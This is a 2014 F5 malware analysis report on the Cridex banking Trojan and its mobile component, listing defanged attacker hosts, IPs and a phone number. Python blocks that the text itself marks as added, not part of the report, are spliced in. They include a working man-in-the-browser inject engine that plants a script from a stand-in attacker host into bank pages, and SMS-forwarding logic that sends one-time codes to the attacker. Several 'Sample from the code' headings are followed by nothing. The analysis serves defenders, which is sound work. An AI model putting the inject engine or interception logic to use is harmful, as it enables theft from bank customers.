Malware Analysis Report January 2014
Cridex Cross-device Malware
PROPRIETARY & CONFIDENTIAL: The material in this report is strictly confidential and contains proprietary information and ideas of F5 INC. It should not be provided to anyone without written consent from F5 INC.
REPORT
Malware Analysis
Contents
Introduction, p. 3
The Threat, p. 4
Trojans, p. 4
Script injections, p. 4
Summary of the Attack, p. 5
Infection Details, p. 6
Blackhole Origins, p. 6
Analysis of the EXE file, p. 11
Anti-Virus Scanning Results, p. 12
Cridex Configurations, p. 14
The Injected Code, p. 18
Infected User Interaction, p. 20
Details and Detection Ratio, p. 27
Anti-Virus Scanning Results, p. 27
Required Permissions, p. 29
Attack Takedown, p. 30
Counter-measures, p. 32
Appendix—F5's solution, p. 33
Introduction
F5 eliminates online identity theft by preventing phishing, Trojan and pharming attacks in
real time, through the implementation of advanced encryption and identification
mechanisms. F5 offers products and services that complement existing anti-fraud
technologies, improving the clients' protection against the aforementioned malicious
activity and providing an encompassing defense mechanism. F5 Security products are
customized to the needs of each client individually.
F5 enables financial organizations working online to gain control over areas that were
virtually unreachable and indefensible up till now, and neutralize local threats found on their
clients’ personal computers, without requiring the installation of software on the end user
side. The transparent solution does not alter the user experience in any way, facilitating a
seamless installation on the firm’s web sites.
F5’s one-of-a-kind solution has proven its exceptional effectiveness time and again in a
large number of financial institutions worldwide, helping them prevent harm to their brand
image and avoid significant economic damage.
Furthermore, F5 provides professional services and advanced research capabilities in the
field of cybercrime including malware, Trojan horses, viruses etc.
The Threat
Trojans
Trojans are malware that appear to the user to perform a desirable function but (perhaps
in addition to the expected function) steal information or harm the system.
Two main techniques used by Trojans to steal users' credentials or to initiate money
transactions on their behalf are:
• Modifying the website's page on the client side (injecting HTML or script into the browser).
• Hooking the browser to capture the information it sends to different banks before the
packets are encrypted by SSL (form grabbing).
F5's knowledge is based on extensive research into the many forms of Trojan infection,
and on experience cleaning infections and repairing the damage caused by zero-day threats.
Our deep understanding of how the malware works is the key to producing the right
defense mechanisms required to safeguard the information transmitted between the client
and the organization.
Script injections
Recently, several eBanking Trojans (e.g. Zeus, Cridex, Citadel) have started using script
injection to modify the original web page. The modification may enable the attacker to
perform money transactions using the victim's credentials. The Trojan injects malicious
JavaScript into the client's browser once the client is connected to the website; the
injected code performs various functions, including attempting a money transfer from the
client's account.
To collect and manage the information sent back by the Trojans, attackers have built
command-and-control systems that receive and organize the stolen data. These are
usually PHP-based systems backed by an SQL database.
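To make the injection mechanism concrete, here is an added example (not code from this report and not Cridex's own code) of the core of a man-in-the-browser web-inject engine in Python: a rule matches the URL the browser is loading and splices a payload into the response body between two anchor strings before the page is rendered, so the bank's server never sees the change. The rule layout is modelled on the Zeus-style `url mask / data_before / data_after / data_inject` format, which is an assumption; the hosts `bank.example` and `attacker.invalid` and the two sample pages are constructed for the demo.

```python
import re
from dataclasses import dataclass, field

# Hypothetical attacker host; nothing is fetched, the string only lands in the page.
INJECT_HOST = "https://attacker.invalid"


@dataclass
class InjectRule:
    url_mask: str            # glob-style mask over the full URL, '*' matches anything
    data_before: str         # anchor text that precedes the injection point
    data_after: str          # anchor text that follows it ('' = insert right after data_before)
    data_inject: str         # payload written between the two anchors
    methods: frozenset = field(default_factory=lambda: frozenset({"GET", "POST"}))


def mask_to_regex(mask):
    """'https://bank.example/secure/*' -> ^https://bank\\.example/secure/.*$"""
    return re.compile("^" + ".*".join(re.escape(p) for p in mask.split("*")) + "$", re.IGNORECASE)


def apply_injects(url, method, body, rules):
    """Rewrite one HTTP response body the way a MITB hook would.

    Returns (new_body, indices_of_rules_applied). Zeus-style semantics are
    assumed: the text between data_before and data_after is replaced by
    data_inject; with an empty data_after the payload is inserted right after
    data_before. Rules whose anchors are not found are skipped silently, so an
    untargeted page (e.g. the login page) comes back byte-for-byte intact.
    """
    applied = []
    for index, rule in enumerate(rules):
        if method.upper() not in rule.methods or not mask_to_regex(rule.url_mask).match(url):
            continue
        start = body.find(rule.data_before)
        if start < 0:
            continue
        head_end = start + len(rule.data_before)
        if rule.data_after:
            tail_start = body.find(rule.data_after, head_end)
            if tail_start < 0:
                continue
        else:
            tail_start = head_end
        body = body[:head_end] + rule.data_inject + body[tail_start:]
        applied.append(index)
    return body, applied


# Constructed rule set: only post-login pages under /secure/ are targeted,
# matching the report's observation that the login page itself is left alone.
RULES = [
    InjectRule("https://bank.example/secure/*", "</title>", "",
               f'<script src="{INJECT_HOST}/inject.js"></script>'),
    InjectRule("https://bank.example/secure/*", '<div id="notice">', "</div>",
               "Your bank now uses a new security solution. "
               '<a href="#" onclick="return startMobileSetup()">DOWNLOAD</a>'),
]

# Constructed sample pages standing in for the bank's real HTML.
LOGIN_PAGE = '<html><head><title>Login</title></head><body><form id="login"></form></body></html>'
OVERVIEW_PAGE = ('<html><head><title>Accounts</title></head><body>'
                 '<div id="notice"></div><h1>Account overview</h1></body></html>')


if __name__ == "__main__":
    for url, page in (("https://bank.example/login", LOGIN_PAGE),
                      ("https://bank.example/secure/overview", OVERVIEW_PAGE)):
        out, hits = apply_injects(url, "GET", page, RULES)
        print(url, "rules applied:", hits)
        print(out)
```

The login page passes through unchanged while the overview page gains both a remote script tag and the fake "security solution" notice; this is why a server-side integrity check of the HTML it sent cannot see the injection, and why detection has to happen in the browser or in the duplicated traffic the injected script produces.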
Summary of the Attack
The attack is carried out in order to infect users' devices with a cross-device Cridex eBanking
Trojan. The attacker uses several known techniques to defeat the user's ability to detect the
attack and to avoid the user having to confirm the installation of the Trojan.
The stages of the attack:
1. The user receives an e-mail from the attacker containing a link.
2. The user clicks on the link.
3. The browser requests a page from a remote Blackhole exploit kit.
4. The Blackhole exploit kit scans the user's browser for vulnerabilities and serves a
malicious PDF file into the page.
5. The PDF file, opened in the user's browser, exploits an Adobe Acrobat Reader
vulnerability to download the Trojan and install it on the user's machine.
6. Once the user logs into his eBanking account, the injected code asks him to enter his
smartphone number.
7. A link is sent to the user's device asking him to install a malicious application.
8. The credentials and personal information the user submits are captured by the
Trojan and sent to a remote DropZone; at the same time the attacker initiates an
automatic monetary transaction.
Infection Details
Blackhole Origins
These are the Blackhole origin and infection pages:
URL: hxxp://kaarqo.releasesmanaged.com.au/TARGETED_BANK/ | IP: 69.197.18.174 | Country of origin: United States of America
URL: hxxp://ftegu9.votersparty.net/TARGETED_BANK/ | IP: 208.70.150.9 | Country of origin: United States of America
URL: hxxp://5b0y1y.siens.com.br/TARGETED_BANK/ | IP: 186.215.182.21 | Country of origin: Brazil
URL: hxxp://tryidon.ru/TARGETED_BANK/ | IP: 5.254.96.215 | Country of origin: Romania
URL: hxxp://motott.ru/TARGETED_BANK/ | IP: 5.254.96.215 | Country of origin: Romania
URL: hxxp://vkokoi.ru/TARGETED_BANK/ | IP: 5.254.96.215 | Country of origin: Romania
URL: hxxp://basanaj.ru/TARGETED_BANK/ | IP: 5.254.96.215 | Country of origin: Romania
URL: hxxp://byuhera.ru/TARGETED_BANK/ | IP: 5.254.96.218 | Country of origin: Romania
The Email Sent To the Victim
Sample of one of the many infection e-mails sent by the attacker to a distribution list gathered online:
The user clicks on the link and downloads a ZIP file.
ZIP file name: "Weitere_Informationen_zum_Transaktions_TARGETED_BANK" (German: "Further information on the transaction, TARGETED_BANK")
The user runs the malicious executable file.
When the user opens the PDF file, obfuscated JavaScript runs on the system. The
JavaScript loads a landing page of the infamous Blackhole exploit kit, which leads to the
installation of the Trojan horse on the user's system through an Adobe Reader
vulnerability exploit.
Once the kit's PHP landing page has been loaded in the user's browser, its script scans
the system for vulnerable browser plug-ins and serves the user a payload-carrying PDF file.
Sample from the code:
Analysis of the EXE file
Properties
Anti-Virus Scanning Results
Executing the EXE file reveals that it is indeed a variant of the Cridex banking Trojan.
Severity: HIGH
The malware is a password-stealing Trojan with the following features:
• Known for installing fake SSL certificates to mislead users in SSL transactions.
• Data-capturing ability, including banking passwords.
• Opening a new TCP connection to send out the captured information.
• HTML injections.
• Stealing information from the victim's computer:
  • IMAP/POP3/SMTP usernames, passwords and server information from mail clients.
  • Bookmarks.
  • E-mail addresses from the Windows Address Book.
Cridex Configurations
The Cridex Trojan is a man-in-the-browser (MITB) Trojan that detects which website the user
is visiting and injects code dedicated to that site into the user's web browser. It can also
capture the information and forms the user submits and deliver them to the attacker's DropZone.
To infect the user, the EXE file is known to be sent via e-mail spam such as fake UPS
orders, postal service notices, Groupon offers and many more. Once the user downloads and
executes the EXE, the Trojan is activated and installs itself on the victim's machine.
The Trojan also modifies the victim's registry; the new values include the Trojan's
configuration file. The stored value is hex-encoded and can be de-obfuscated.
Sample of the obfuscated configuration file:
Sample of the de-obfuscated configuration file:
As can be seen in the de-obfuscated configuration above, the Trojan targets a large number of financial institutions worldwide.
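As an added example (not the report's tooling and not Cridex's real scheme), the script below shows how an analyst would recover such a registry value: hex-decode the REG_BINARY export and brute-force a single-byte XOR layer, ranking the 256 candidates by how much they look like a text configuration carrying URLs. The XOR layer, the key 0x5A, the XML-style layout and the sample blob are all constructed for the demo; the real Cridex obfuscation is not documented on this page, so treat the XOR step as a placeholder for whatever the sample actually uses.

```python
import string

# Bytes we accept as "text": printable ASCII plus the usual whitespace.
TEXT_BYTES = set(string.printable.encode("ascii"))


def hex_to_bytes(hex_value):
    """Decode a REG_BINARY export; accepts 'aabbcc', 'aa,bb,cc' or 'aa bb cc'."""
    digits = "".join(ch for ch in hex_value if ch in string.hexdigits)
    return bytes.fromhex(digits)


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def text_score(candidate):
    """Higher is more config-like: fraction of text bytes plus bonuses for XML and URLs."""
    if not candidate:
        return 0.0
    printable = sum(1 for b in candidate if b in TEXT_BYTES) / len(candidate)
    text = candidate.decode("latin-1")
    bonus = 0.5 if ("<" in text and ">" in text) else 0.0   # XML-style config
    bonus += 0.5 if "http" in text.lower() else 0.0          # inject / C&C / drop-zone URLs
    return printable + bonus


def recover_config(hex_value):
    """Hex-decode the registry value and try every single-byte XOR key.

    Returns (key, text). Key 0 means the value was plain hex-encoded text.
    """
    blob = hex_to_bytes(hex_value)
    best = (None, None, -1.0)
    for key in range(256):
        candidate = xor_bytes(blob, key)
        score = text_score(candidate)
        if score > best[2]:
            best = (key, candidate.decode("latin-1"), score)
    return best[0], best[1]


# Constructed sample: an XML-style injection config, XOR-obfuscated with key
# 0x5A and hex-encoded the way a registry export would show it. The layout is
# invented for the demo, not the real Cridex configuration format.
SAMPLE_PLAIN = (
    '<config>\n'
    '  <httpinject url="https://bank.example/secure/*" method="GET">\n'
    '    <inject>script src=https://attacker.invalid/a.js</inject>\n'
    '  </httpinject>\n'
    '  <dropzone>https://drop.attacker.invalid/gate</dropzone>\n'
    '</config>\n'
)
SAMPLE_HEX = ",".join(f"{b:02x}" for b in xor_bytes(SAMPLE_PLAIN.encode("ascii"), 0x5A))


if __name__ == "__main__":
    key, text = recover_config(SAMPLE_HEX)
    print(f"key=0x{key:02x}")
    print(text)
```

The scoring matters more than the XOR loop: several wrong keys also produce all-printable output (shifting letters into other letters), so the URL and angle-bracket bonuses are what single out the real configuration. If no key scores well, the sample uses something other than a single-byte XOR and the next step is to locate the decryption routine in the binary.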
The Trojan's C&C can be seen while monitoring its traffic: hxxp://portasible.ru/BUYee/+jHKSCAAAA/xyVpBAAAAA
DNS query: portasible.ru
The server's IP: 37.235.48.69
Whois information
The DropZone can be identified in the injected code:
DNS query: tstore.mobi
The server's IP: 37.235.53.202
The information captured by the Trojan is saved to a local log file and delivered to the
attacker's DropZone. The saved logs include the captured web page (base64-encoded), the
captured URLs and all of the submitted information.
The Injected Code
As the Trojan is a generic one that attacks a vast number of financial institutions worldwide, it carries several JavaScripts, of which only a few are activated, depending on the user's eBanking account.
Unlike earlier variants of this kind of Trojan, the code is injected into the bank's internal web pages and NOT into the login page the user loads at the beginning of the session.
Below is a sample of the injected code. Each JavaScript is triggered by the browser depending on the targeted internal URL.
The injected code communicates with another malicious server located at:
DNS Query: start-ssecurity.com
The server’s IP 62.75.196.133
Infected User Interaction
Once the user has completed the login and entered his eBanking account, the Trojan injects
the code relevant to that financial institution. This specific Trojan is tailored to abuse the
name of Trusteer, the security company recently acquired by IBM, to make users think that
the bank has started using Trusteer security solutions and to ask them to download the
company's "security" mobile application.
1) The user sees the bank notification regarding "the new security solution" and is asked to
download an application to his mobile device.
2) Clicking on the 'DOWNLOAD' button pops up a new notification asking the user to enter his
phone number and choose his mobile device.
3) The user receives an SMS on his smartphone containing a link to download the
application:
hxxp://mobiletrusteer.mobi/TARGETED_BANK.apk
4) Clicking the SMS link installs the malicious application on the user's smartphone; the
user is then asked to activate it by granting the mobile Trojan device administrator
permissions.
On being launched, the application sends an SMS message to the attacker's mobile number:
+447781470730
5) A window is displayed in which the user is asked to enter his password and a
password verification.
When the user clicks the submit button, the application compares the password and the
password-verification field without sending any data to the attacker. If they match, the
user sees the confirmation code screen on his smartphone.
6) The victim's "confirmation code":
The user is then asked to enter it on the website, as seen below:
The Trojan completes the process by displaying a message on the victim's computer
informing him that the "security" upgrade is complete and that he can proceed with
his online eBanking activities.
Additional information
Once the application is installed on the device, every incoming SMS message is
scanned by the application (the mobile Trojan).
When the phone receives an SMS message in the format "random&&time", the
application saves the time parameter and, within that time range, forwards all
incoming SMS messages to the attacker without the victim's knowledge.
To stop the forwarding, the attacker sends an SMS message containing "DELETE" to
the user's phone.
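The SMS-handling logic described above, as an added example in Python (a model written for this page, not code from the APK). It assumes the `time` value is in minutes, that the command SMS and the forwarded messages are hidden from the victim (the page says only that the forwarding is unknown to the victim), that forwarded text is sent as `sender:body`, and that the launch message reads `installed:<device id>`; the timeline and all message texts are constructed.

```python
ATTACKER_NUMBER = "+447781470730"   # the number reported on the page


class SmsInterceptor:
    """State of the mobile component's SMS handling (model, not the APK's code)."""

    def __init__(self):
        self.window_end = None   # epoch seconds; None = not forwarding

    def on_launch(self, device_id):
        """First launch: report the infection to the attacker. Message text is assumed."""
        return [(ATTACKER_NUMBER, f"installed:{device_id}")]

    def on_sms(self, sender, body, now):
        """Handle one incoming SMS.

        Returns (show_to_victim, outbound), where outbound is a list of
        (recipient, text) messages the app sends in reaction.
        """
        text = body.strip()
        # "DELETE" closes the forwarding window.
        if text.upper() == "DELETE":
            self.window_end = None
            return False, []
        # "random&&time" opens a window; the random prefix is ignored and the
        # time value is taken as minutes (assumption).
        if "&&" in text:
            _random_part, _, window = text.partition("&&")
            if window.strip().isdigit():
                self.window_end = now + int(window.strip()) * 60
                return False, []
        # Inside the window every SMS (e.g. the bank's mTAN) goes to the
        # attacker and is hidden from the victim (assumption, see lead-in).
        if self.window_end is not None:
            if now <= self.window_end:
                return False, [(ATTACKER_NUMBER, f"{sender}:{text}")]
            self.window_end = None   # window expired, fall through
        return True, []


def simulate(events):
    """Drive the model with (time, sender, body) tuples; returns (delivered, forwarded)."""
    bot = SmsInterceptor()
    delivered, forwarded = [], []
    for now, sender, body in events:
        show, outbound = bot.on_sms(sender, body, now)
        if show:
            delivered.append(body)
        forwarded.extend(outbound)
    return delivered, forwarded


# Constructed timeline; the command SMS and the bank SMS texts are invented.
T0 = 1_389_000_000.0
SAMPLE_EVENTS = [
    (T0,       "+4915700000000", "Dinner tonight?"),                        # no window yet: delivered
    (T0 + 60,  ATTACKER_NUMBER,  "k8s2&&10"),                               # opens a 10-minute window
    (T0 + 120, "BANK",           "mTAN 482913 for transfer of 2,500 EUR"),  # forwarded, hidden
    (T0 + 400, ATTACKER_NUMBER,  "DELETE"),                                 # window closed
    (T0 + 460, "BANK",           "mTAN 117733 for transfer of 40 EUR"),     # delivered normally
]

if __name__ == "__main__":
    delivered, forwarded = simulate(SAMPLE_EVENTS)
    print("victim saw:", delivered)
    print("attacker got:", forwarded)
```

The window is what makes the scheme quiet: the attacker opens it only once the PC-side script has started the transfer and the bank is about to send the mTAN, so the phone forwards a single message rather than leaking traffic all day, and "DELETE" returns the device to normal behaviour before the victim notices missing texts.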
The SMS parser's processing:
Last stage of the attack
The JavaScript running on the victim's computer receives the TAN/OTP and completes
the transaction. The TAN is pulled from storage by the computer Trojan, which in turn
sends it to the bank to complete the illicit transfer of money out of the customer's
account and into the attacker's "mule" account. The customer's screen does not show
any of this activity, and he is completely unaware of the fraudulent transaction that just
took place.
Details and Detection Ratio
Anti-Virus Scanning Results
Only 21 of 46 anti-virus engines detected the Cridex cross-device Trojan as a malicious application. The full scan results are as follows:
Required Permissions
Once the user activates the application on his smartphone, the attacker has administrator permission on the victim's device and is therefore able to control a vast number of functions, such as:
1. Send/receive SMS messages using the victim's mobile phone number.
2. Access the internet through the victim's mobile.
3. Control incoming and outgoing phone calls.
4. Move between Wi-Fi networks.
5. Change the phone state.
6. Delete/modify SD card contents.
7. Read contact list data.
8. Record any audio on the device.
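As an added example that is not part of the report, the following Python script triages a decoded AndroidManifest.xml for the capabilities listed above: it maps them to the Android permissions that grant them (the mapping is the editor's, not taken from the page) and flags the combination an mTAN-stealing app needs, namely SMS receive and send rights together with a device-administrator receiver or an SMS receiver that asks to run ahead of the stock messaging app. The manifest and the package name are constructed.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Capabilities listed above, mapped to the Android permissions that grant them.
CAPABILITIES = {
    "send/receive SMS": {"android.permission.SEND_SMS", "android.permission.RECEIVE_SMS",
                         "android.permission.READ_SMS"},
    "internet access": {"android.permission.INTERNET"},
    "control phone calls": {"android.permission.CALL_PHONE", "android.permission.PROCESS_OUTGOING_CALLS"},
    "switch Wi-Fi networks": {"android.permission.CHANGE_WIFI_STATE", "android.permission.ACCESS_WIFI_STATE"},
    "change phone state": {"android.permission.READ_PHONE_STATE", "android.permission.MODIFY_PHONE_STATE"},
    "modify SD card": {"android.permission.WRITE_EXTERNAL_STORAGE"},
    "read contacts": {"android.permission.READ_CONTACTS"},
    "record audio": {"android.permission.RECORD_AUDIO"},
}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
BIND_DEVICE_ADMIN = "android.permission.BIND_DEVICE_ADMIN"


def triage_manifest(manifest_xml):
    """Summarise what a decoded AndroidManifest.xml lets the app do."""
    root = ET.fromstring(manifest_xml)
    perms = {e.get(ANDROID + "name") for e in root.iter("uses-permission")}
    caps = sorted(c for c, needed in CAPABILITIES.items() if perms & needed)

    # A receiver guarded by BIND_DEVICE_ADMIN is the hook for "enable administrator".
    device_admin = any(r.get(ANDROID + "permission") == BIND_DEVICE_ADMIN for r in root.iter("receiver"))
    # An SMS_RECEIVED filter with a high priority sees (and can swallow) texts
    # before the user's messaging app does.
    sms_priority = None
    for flt in root.iter("intent-filter"):
        if any(a.get(ANDROID + "name") == SMS_RECEIVED for a in flt.iter("action")):
            sms_priority = max(sms_priority or 0, int(flt.get(ANDROID + "priority", "0")))

    stealer = ({"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"} <= perms
               and (device_admin or (sms_priority or 0) > 0))
    return {
        "package": root.get("package"),
        "permissions": sorted(p for p in perms if p),
        "capabilities": caps,
        "device_admin": device_admin,
        "sms_receiver_priority": sms_priority,
        "sms_stealer_pattern": stealer,
    }


# Constructed manifest; the package name is invented.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.fakesecurity">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application android:label="Security App">
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for key, value in triage_manifest(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

Run it on the manifest extracted from an APK (for example with apktool); a "security" app from a bank that requests SMS sending, registers a maximum-priority SMS receiver and asks for device-administrator rights has no legitimate reason for that combination.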
Attack Takedown
A couple of hours after the first notification was received, the F5 Security Operations Center began shutting down the attack. Within a very short time frame, all attack resources were blocked.
APK resource after SOC shutdown:
Script resource after SOC shutdown:
Script resource after SOC shutdown:
Trojan C&C after SOC shutdown:
All executable file resources were shut down as well.
Counter-measures
1. Educate your users not to open or click on unknown/unexpected e-mail links.
2. Implement an anti-virus solution for your organization and protect your end users.
Keep it up to date.
3. Patch your end users' machines and make sure their software is updated, including browsers, Java,
Flash, PDF readers and all Microsoft software.
4. Limit your users' accounts; not everybody has to be an administrator.
5. Apply strict web content filters on the users' browsers.
6. Implement a mail scanning solution.
7. Implement F5 WebSafe & MobileSafe to detect infected users entering your web page
and mitigate the Trojans.
For more useful tips contact your local F5 Networks account manager.
Appendix—F5's solution
Real-time identification of affected users: WebSafe/MobileSafe contains code to detect duplicated communications, a sure sign that the user is affected by a Trojan and that the information he provides to the bank is also being sent to an unauthorized drop zone.
Identification of malicious script injection: once downloaded to the client's browser, WebSafe/MobileSafe makes sure there has been no change to the site's HTML. If such a change is detected, the bank is notified immediately.
Protection against Trojan-generated money transfers: the combination of recognizing affected users, encrypting information and recognizing malicious script is a key element in preventing Trojans from performing unauthorized actions within the account. The WebSafe/MobileSafe component detects the automatic attempts and is able to intercept them.
Malware research: F5 has a dedicated Trojan and malware R&D team that searches for new threats and new versions of existing ones. The team also analyzes the programming techniques and methodologies used to develop the malware in order to keep the F5 line of products up to date and effective against any threat.
Authors
Adir Tzadok, Security Operation Center Analyst
Itzik Chimino, Security Operation Center Team Leader
Ilan Meller, Security Operation Center Manager
F5 Networks, Inc. 401 Elliott Avenue West, Seattle, WA 98119 888-882-4447 www.f5.com
Offices: F5 Networks, Inc. (Corporate Headquarters); F5 Networks (Asia-Pacific); F5 Networks Ltd. (Europe/Middle-East/Africa); F5 Networks Japan K.K.
©2014 F5 Networks, Inc. All rights reserved. F5, F5 Networks, and the F5 logo are trademarks of F5 Networks, Inc. in the U.S. and in certain other countries. Other F5 trademarks are identified at f5.com.
Any other products, services, or company names referenced herein may be trademarks of their respective owners with no endorsement or affiliation, express or implied, claimed by F5. 01/14
RPRT-SEC-17954-malware-analysis